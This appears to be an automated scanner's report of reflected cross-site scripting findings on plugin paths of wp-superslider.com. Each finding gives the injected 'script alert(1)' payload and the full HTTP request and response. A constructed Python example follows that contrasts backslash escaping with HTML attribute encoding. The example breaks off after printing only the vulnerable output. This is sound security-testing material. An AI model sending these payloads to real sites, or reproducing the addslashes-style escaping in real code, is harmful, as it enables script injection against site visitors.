Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674548+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674549; expires=Thu, 02-Feb-2012 19:22:29 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d94d5"><script>alert(1)</script>8937e1e9ddf was submitted in the REST URL parameter 6. This input was echoed as d94d5\"><script>alert(1)</script>8937e1e9ddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data/supersliderd94d5"><script>alert(1)</script>8937e1e9ddf/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674550+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53483

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d48"><script>alert(1)</script>dbdb56bcb58 was submitted in the REST URL parameter 7. This input was echoed as e1d48\"><script>alert(1)</script>dbdb56bcb58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogine1d48"><script>alert(1)</script>dbdb56bcb58/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe00"><script>alert(1)</script>5f54c2a8b93 was submitted in the REST URL parameter 8. This input was echoed as afe00\"><script>alert(1)</script>5f54c2a8b93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/defaultafe00"><script>alert(1)</script>5f54c2a8b93/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674554+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674555; expires=Thu, 02-Feb-2012 19:22:35 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87487"><script>alert(1)</script>39e89501d03 was submitted in the REST URL parameter 9. This input was echoed as 87487\"><script>alert(1)</script>39e89501d03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css87487"><script>alert(1)</script>39e89501d03 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674557+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674557; expires=Thu, 02-Feb-2012 19:22:37 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea79a"><script>alert(1)</script>9de5f2df942 was submitted in the REST URL parameter 1. This input was echoed as ea79a\"><script>alert(1)</script>9de5f2df942 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /siteea79a"><script>alert(1)</script>9de5f2df942/wp-content/plugins/superslider-menu/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63b7c"><script>alert(1)</script>2271b17551d was submitted in the REST URL parameter 2. This input was echoed as 63b7c\"><script>alert(1)</script>2271b17551d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content63b7c"><script>alert(1)</script>2271b17551d/plugins/superslider-menu/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc9a"><script>alert(1)</script>550f85bc728 was submitted in the REST URL parameter 3. This input was echoed as dfc9a\"><script>alert(1)</script>550f85bc728 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginsdfc9a"><script>alert(1)</script>550f85bc728/superslider-menu/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeafd"><script>alert(1)</script>0b49ecee366 was submitted in the REST URL parameter 4. This input was echoed as eeafd\"><script>alert(1)</script>0b49ecee366 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menueeafd"><script>alert(1)</script>0b49ecee366/js/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674566+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674566; expires=Thu, 02-Feb-2012 19:22:46 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daaa3"><script>alert(1)</script>cfbe353e491 was submitted in the REST URL parameter 5. This input was echoed as daaa3\"><script>alert(1)</script>cfbe353e491 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/jsdaaa3"><script>alert(1)</script>cfbe353e491/nav-follow-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674568+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fcb6"><script>alert(1)</script>4b7a1a7b17f was submitted in the REST URL parameter 6. This input was echoed as 1fcb6\"><script>alert(1)</script>4b7a1a7b17f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-menu/js/nav-follow-min.js1fcb6"><script>alert(1)</script>4b7a1a7b17f HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d618f"><script>alert(1)</script>b5bbe65fee5 was submitted in the REST URL parameter 1. This input was echoed as d618f\"><script>alert(1)</script>b5bbe65fee5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sited618f"><script>alert(1)</script>b5bbe65fee5/wp-content/plugins/superslider-menu/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed395"><script>alert(1)</script>4ecb0a29794 was submitted in the REST URL parameter 2. This input was echoed as ed395\"><script>alert(1)</script>4ecb0a29794 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contented395"><script>alert(1)</script>4ecb0a29794/plugins/superslider-menu/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf143"><script>alert(1)</script>7ab2e0b1bf was submitted in the REST URL parameter 3. This input was echoed as bf143\"><script>alert(1)</script>7ab2e0b1bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginsbf143"><script>alert(1)</script>7ab2e0b1bf/superslider-menu/js/superslider-menu-min.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:44 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674565+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
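The following Python is an added, constructed example; it is not part of the scanner report and not the site's code. It models the two behaviours at issue: reflecting the request path into a double-quoted attribute with addslashes()-style escaping, which is what the \" in the echoed output suggests the application does, and reflecting it with proper HTML attribute encoding. Python's html.parser stands in for the browser's tokenizer. The attribute name and surrounding markup are assumptions, since the report does not show the 404 template; the payload is the one submitted above.

```python
"""Why backslash-escaping does not stop attribute-context XSS (constructed example)."""
from html import escape
from html.parser import HTMLParser

# Payload exactly as submitted in the report.
PAYLOAD = 'bf143"><script>alert(1)</script>7ab2e0b1bf'

# Stand-in for the 404 template. The real template is not shown in the report,
# so the element and attribute used here are assumptions.
TEMPLATE = '<a href="/site/wp-content/{path}/superslider-menu/js/x.js">retry</a>'


def addslashes(s: str) -> str:
    """PHP addslashes()/magic_quotes_gpc semantics: backslash before ' " \\ and NUL."""
    out = []
    for ch in s:
        if ch in ('\\', '"', "'"):
            out.append('\\' + ch)
        elif ch == '\x00':
            out.append('\\0')
        else:
            out.append(ch)
    return ''.join(out)


def render_vulnerable(path: str) -> str:
    """Reflects the path with only backslash escaping, as the echoed output suggests."""
    return TEMPLATE.format(path=addslashes(path))


def render_fixed(path: str) -> str:
    """Reflects the path HTML-encoded for the attribute context
    (the equivalent of htmlspecialchars($path, ENT_QUOTES) in PHP)."""
    return TEMPLATE.format(path=escape(path, quote=True))


class TagCollector(HTMLParser):
    """Records every start tag the tokenizer emits, with its decoded attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(html: str):
    """Tokenize the markup and return [(tag_name, {attr: value}), ...]."""
    p = TagCollector()
    p.feed(html)
    p.close()
    return p.tags


def script_escapes_attribute(html: str) -> bool:
    """True if the reflected payload produced a real <script> element instead of
    staying inside the attribute value."""
    return any(tag == 'script' for tag, _ in parse_tags(html))


if __name__ == '__main__':
    vuln = render_vulnerable(PAYLOAD)
    fixed = render_fixed(PAYLOAD)
    print(vuln)
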